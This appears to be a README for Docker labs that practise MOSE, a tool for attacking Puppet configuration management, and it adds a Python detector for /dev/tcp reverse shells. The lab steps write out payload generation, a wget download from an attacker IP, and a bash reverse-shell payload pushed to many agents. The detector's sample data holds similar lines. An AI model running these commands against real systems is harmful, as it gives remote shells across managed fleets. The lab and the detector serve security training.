Create test labs which can be used to play around with MOSE and Puppet.
Warning, take heed: This lab should be run in a controlled environment, as it contains vulnerable assets.
You must download and install the following for this environment to work:
To create an environment with a Puppet Master that controls a single agent with a simple hello world module, run the following command:
cd basic && make run
To run MOSE against it:
- Build MOSE using `make build` in the MOSE repo
- Generate a payload with MOSE: `./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t puppet`
- Get it to the puppet master: `docker exec -it basic-puppetmaster wget http://YOURIPADDRESSGOESHERE:8080/puppet-linux`
- Exec into the puppet master: `docker exec -it basic-puppetmaster bash`
- Run the payload: `chmod +x puppet-linux; ./puppet-linux`
- Wait for 30 minutes or exec into one of the agents and kick off the payload manually: `docker exec -it basic-puppetagent bash` and then run `puppet agent -t`
- For this example, you should note that a file has been created in `/tmp` in the basic-puppetagent container, as we specified in step 2.
To tear down the basic lab, run the following command:
make destroy
To create an environment with a Puppet Master that controls n number of agents, start by specifying the number of agents to create:
- Open `mass_puppet.py`
- Change `number_agents` to your desired number of agents. The counter starts at 2, so 21 agents actually yields 19.
Next, run the following command to stand up the environment:
cd mass_agents && make run
To run MOSE against the lab and get a ton of shells, do the following:
- Build MOSE using `make build` in the MOSE repo
- Download Platypus from here: https://github.com/WangYihang/Platypus/releases/tag/v1.1.0
- Run Platypus using the instructions provided in the repo's README
- Generate a payload with MOSE: `./mose -c "bash -i >& /dev/tcp/YOURIPADDRESSGOESHERE/8080 0>&1 &" -t puppet`
- Get it to the puppet master: `docker exec -it massagents-puppetmaster wget http://YOURIPADDRESSGOESHERE:8080/puppet-linux`
- Exec into the puppet master: `docker exec -it massagents-puppetmaster bash`
- Run the payload: `chmod +x puppet-linux; ./puppet-linux`
Back on the attacker's system, kick off the agents by running:
bash pwn.sh
To tear down the mass agent lab, run the following command:
make destroy
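When the mass agent lab is used to exercise detection, the payload from the steps above has a recognizable shape: an interactive shell whose streams are redirected to bash's `/dev/tcp/<host>/<port>` pseudo-path. The following Python is an added example, not part of MOSE or this lab; the tab-separated record format (container, parent process, command line), the sample events and the function name are constructed for illustration.

```python
import re

# Constructed sample records (not real lab output): container<TAB>parent<TAB>command line.
SAMPLE_EVENTS = """\
massagents-puppetagent2\tpuppet\tbash -i >& /dev/tcp/192.0.2.10/8080 0>&1 &
massagents-puppetagent3\tpuppet\t/bin/sh -c touch /tmp/BLA && echo test >> /tmp/BLA
massagents-puppetagent4\tsshd\tbash -i
massagents-puppetagent5\tpuppet\tsh -c 'bash -i >& /dev/tcp/attacker.example/8080 0>&1 &'
massagents-puppetagent6\tcron\tcat < /dev/tcp/198.51.100.7/25
"""

# bash opens a socket when a redirection names /dev/tcp/<host>/<port> (or /dev/udp/...).
SOCKET_REDIRECT = re.compile(r"/dev/(tcp|udp)/([^/\s'\"]+)/(\d{1,5})")
# A shell started with an interactive flag, e.g. `bash -i` or `sh -i`.
INTERACTIVE_SHELL = re.compile(r"\b(?:ba|da|z|k)?sh\s+(?:-\w+\s+)*-\w*i\w*\b")
# stdin duplicated from stdout (`0>&1` / `0<&1`): the shell reads its input from the socket.
STDIN_FROM_SOCKET = re.compile(r"\b0[<>]&1\b")


def find_socket_shells(events: str) -> list[dict]:
    """Return one finding per record whose command line redirects to /dev/tcp or /dev/udp."""
    findings = []
    for line in events.splitlines():
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue  # skip malformed records instead of guessing at fields
        container, parent, cmd = parts
        match = SOCKET_REDIRECT.search(cmd)
        if not match or not 0 < int(match.group(3)) <= 65535:
            continue
        # Socket + interactive shell + stdin tied to the socket is the reverse-shell shape;
        # a socket redirect alone is still worth a look, at lower severity.
        is_shell = bool(INTERACTIVE_SHELL.search(cmd) and STDIN_FROM_SOCKET.search(cmd))
        findings.append({
            "container": container,
            "parent": parent,
            "dest": f"{match.group(2)}:{match.group(3)}",
            "severity": "high" if is_shell else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_socket_shells(SAMPLE_EVENTS):
        print(finding)
```

Plain `bash -i` sessions and the `touch /tmp/BLA` payload are deliberately not flagged, since neither opens a socket from the command line.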
To create an environment with a Puppet Master that controls prod and dev environments that include a web application, a MySQL database, and various package installs, run the following command:
cd extended && make run
To run MOSE against it:
- Build MOSE using `make build` in the MOSE repo
- Generate a payload with MOSE: `./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t puppet`
- Get it to the puppet master: `docker exec -it extended-puppetmaster wget http://YOURIPADDRESSGOESHERE:8090/puppet-linux`
- Exec into the puppet master: `docker exec -it extended-puppetmaster bash`
- Run the payload: `chmod +x puppet-linux; ./puppet-linux`
- Wait for 30 minutes or exec into one of the agents and kick off the payload manually: `docker exec -it prodlaptop bash` and then run `puppet agent -t`
- For this example, you should note that a file has been created in `/tmp` in the prodlaptop container, as we specified in step 2.

You can also target development systems by running `puppet agent -t --environment development` on the appropriate systems.
This environment can be used for more interesting attack chains, such as targeted payloads specifically for the webservers, leveraging secrets to access a database, etc.
To tear down the extended lab, run the following command:
make destroy